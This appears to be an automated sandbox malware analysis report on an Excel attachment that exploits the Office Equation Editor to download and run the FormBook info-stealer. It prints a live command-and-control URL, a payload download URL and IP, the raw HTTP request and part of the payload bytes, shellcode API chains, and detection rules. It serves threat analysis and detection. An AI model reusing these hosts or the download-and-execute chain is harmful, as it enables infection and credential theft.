Windows Analysis Report
PO 65738963578 Revise Settlement.xlsx

Overview

General Information

Sample Name: PO 65738963578 Revise Settlement.xlsx
Analysis ID: 626146
MD5: e5c9c992c088a778a6348f4a58dd78d3
SHA1: 754f386df06785ddd4cb4a04bed626ceab65d5ab
SHA256: 6b8ffb251308a2396f35780df9376b329a6c741419db44ea4f89d88ed932fbf2
Tags: VelvetSweatshopxlsx
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Shellcode detected
Office equation editor drops PE file
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Office equation editor establishes network connection
Drops PE files to the user root directory
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Potential document exploit detected (unknown TCP traffic)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Office Equation Editor has been started
Contains functionality to download and launch executables
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

AV Detection
barindex
Found malware configuration
Source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.cortesdisenosroutercnc.com/itq4/"], "decoy": ["worklocalcortland.com", "hostydom.tech", "ittakegenius.com", "clarisfixion.com", "totalzerosband.com", "shop-for-432.club", "exploremytruth.com", "skarpaknivar.com", "teknikunsur.net", "shoppingclick.online", "808gang.net", "solobookings.com", "mikunandina.com", "insumedkap.com", "kingdomcell.com", "qabetalive838475.com", "foxyreal.website", "filmweltruhr.com", "pokibar.com", "girassolpresentes.com", "rprent.com", "klatch22.com", "qam3.com", "bbuur.com", "grandmino.com", "windowcontractor.info", "myownstack.com", "suprebahia.com", "amaliebeac.space", "rugggedclassicvinyl.com", "thevillagetour.com", "obsoletely.xyz", "fintell.online", "mychianfts.net", "skillingyousoftly.com", "mejicat.com", "tntpowerspeedagility.com", "richardklewis.store", "yourdmvhometeam.com", "citestaccnt1631545392.com", "weddingbyneus.com", "mbkjewelry.com", "shubhamsports.com", "bountyhub.xyz", "heritage.solar", "vitalorganicbarsoap.com", "cloandjoe.com", "royalluxextensions.com", "lbrzandvoort.com", "knowmust.xyz", "okpu.top", "balanz.kitchen", "buggy4t.com", "gownstevensond.com", "f4w6.claims", "workingfromgarden.com", "foryourtinyhuman.com", "preventbiotech.com", "happyklikshop.com", "tuyenxanh.com", "lift2.cloud", "skazhiraku.net", "purpleatticexperiment.com", "freebtc.pro"]}
Multi AV Scanner detection for submitted file
Source: PO 65738963578 Revise Settlement.xlsx Virustotal: Detection: 41% Perma Link
Source: PO 65738963578 Revise Settlement.xlsx ReversingLabs: Detection: 29%
Yara detected FormBook
Source: Yara match File source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: www.cortesdisenosroutercnc.com/itq4/ Avira URL Cloud: Label: malware
Source: http://198.12.81.20/busy/BUSY.exeC: Avira URL Cloud: Label: malware
Source: http://198.12.81.20/busy/BUSY.exeiiC: Avira URL Cloud: Label: malware
Source: http://198.12.81.20/busy/BUSY.exej Avira URL Cloud: Label: malware
Source: http://198.12.81.20/busy/BUSY.exe Avira URL Cloud: Label: malware
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\BUSY[1].exe Joe Sandbox ML: detected
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 2.3.EQNEDT32.EXE.998472.2.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 2.3.EQNEDT32.EXE.931118.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 2.3.EQNEDT32.EXE.998472.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 2.2.EQNEDT32.EXE.931118.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 5.2.idcqz.exe.160000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits
barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office equation editor establishes network connection
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Network connect: IP: 198.12.81.20 Port: 80 Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\hkxhi\tnjelr\oppx\aef3432ff76843aeb030a76c099018f6\zhseks\qyypcejy\Release\qyypcejy.pdb source: vbc.exe, 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmp, idcqz.exe, 00000005.00000000.964431298.0000000000B5E000.00000002.00000001.01000000.00000005.sdmp, idcqz.exe, 00000005.00000002.972687897.0000000000B5E000.00000002.00000001.01000000.00000005.sdmp, idcqz.exe, 00000006.00000000.967212091.0000000000B5E000.00000002.00000001.01000000.00000005.sdmp, idcqz.exe.4.dr, nswAB85.tmp.4.dr
Source: C:\Users\Public\vbc.exe Code function: 4_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 4_2_00405D7A
Source: C:\Users\Public\vbc.exe Code function: 4_2_004069A4 FindFirstFileW,FindClose, 4_2_004069A4
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040290B FindFirstFileW, 4_2_0040290B

Software Vulnerabilities
barindex
Shellcode detected
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0379043F ShellExecuteW,ExitProcess, 2_2_0379043F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_037903A2 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_037903A2
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03790411 URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_03790411
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_037902FD ExitProcess, 2_2_037902FD
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_037903BC URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_037903BC
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03790332 URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_03790332
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0379042A ShellExecuteW,ExitProcess, 2_2_0379042A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03790464 ExitProcess, 2_2_03790464
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03790316 URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_03790316
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 198.12.81.20:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 198.12.81.20:80

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.cortesdisenosroutercnc.com/itq4/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 198.12.81.20 198.12.81.20
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 May 2022 14:42:02 GMTServer: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.0.17Last-Modified: Fri, 13 May 2022 11:21:13 GMTETag: "3e719-5dee2df4306a6"Accept-Ranges: bytesContent-Length: 255769Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a8 21 60 47 ec 40 0e 14 ec 40 0e 14 ec 40 0e 14 2f 4f 51 14 ee 40 0e 14 ec 40 0f 14 49 40 0e 14 2f 4f 53 14 e3 40 0e 14 b8 63 3e 14 e0 40 0e 14 2b 46 08 14 ed 40 0e 14 52 69 63 68 ec 40 0e 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a9 9a 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 68 00 00 00 12 3a 00 00 08 00 00 46 36 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 a0 3b 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 85 00 00 a0 00 00 00 00 90 3b 00 50 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 67 00 00 00 10 00 00 00 68 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9a 13 00 00 00 80 00 00 00 14 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 eb 39 00 00 a0 00 00 00 06 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 00 01 00 00 90 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 50 0a 00 00 00 90 3b 00 00 0c 00 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /busy/BUSY.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.81.20Connection: Keep-Alive
Contains functionality to download and execute PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_037903A2 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_037903A2
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: EQNEDT32.EXE, 00000002.00000002.962051283.0000000000993000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.957716678.0000000000995000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.957591304.0000000000993000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000002.00000002.962051283.0000000000993000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.957716678.0000000000995000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.957591304.0000000000993000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000002.00000002.961987848.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.957575421.000000000098D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://198.12.81.20/busy/BUSY.exe
Source: EQNEDT32.EXE, 00000002.00000003.957575421.000000000098D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://198.12.81.20/busy/BUSY.exeC:
Source: EQNEDT32.EXE, 00000002.00000002.961987848.00000000008FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://198.12.81.20/busy/BUSY.exeiiC:
Source: EQNEDT32.EXE, 00000002.00000002.962566315.0000000003790000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://198.12.81.20/busy/BUSY.exej
Source: EQNEDT32.EXE, 00000002.00000003.957494354.0000000000955000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmp, vbc.exe, 00000004.00000000.959904121.000000000040A000.00000008.00000001.01000000.00000004.sdmp, BUSY[1].exe.2.dr, vbc.exe.2.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D8559C53.emf Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_037903A2 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_037903A2
Source: global traffic HTTP traffic detected: GET /busy/BUSY.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.81.20Connection: Keep-Alive
Contains functionality for read data from the clipboard
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040580F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 4_2_0040580F

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\BUSY[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Yara signature match
Source: 2.2.EQNEDT32.EXE.931118.0.raw.unpack, type: UNPACKEDPE Matched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
Source: 2.3.EQNEDT32.EXE.931118.1.unpack, type: UNPACKEDPE Matched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
Source: 2.3.EQNEDT32.EXE.931118.1.raw.unpack, type: UNPACKEDPE Matched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
Source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.EQNEDT32.EXE.931118.0.unpack, type: UNPACKEDPE Matched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
Source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Contains functionality to shutdown / reboot the system
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 4_2_00403646
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B51890 5_2_00B51890
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B596A0 5_2_00B596A0
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B57E88 5_2_00B57E88
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B59C12 5_2_00B59C12
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B5C3BD 5_2_00B5C3BD
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B5A184 5_2_00B5A184
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B5B3F1 5_2_00B5B3F1
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00110A56 5_2_00110A56
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: PO 65738963578 Revise Settlement.xlsx Virustotal: Detection: 41%
Source: PO 65738963578 Revise Settlement.xlsx ReversingLabs: Detection: 29%
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Process created: C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Process created: C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab
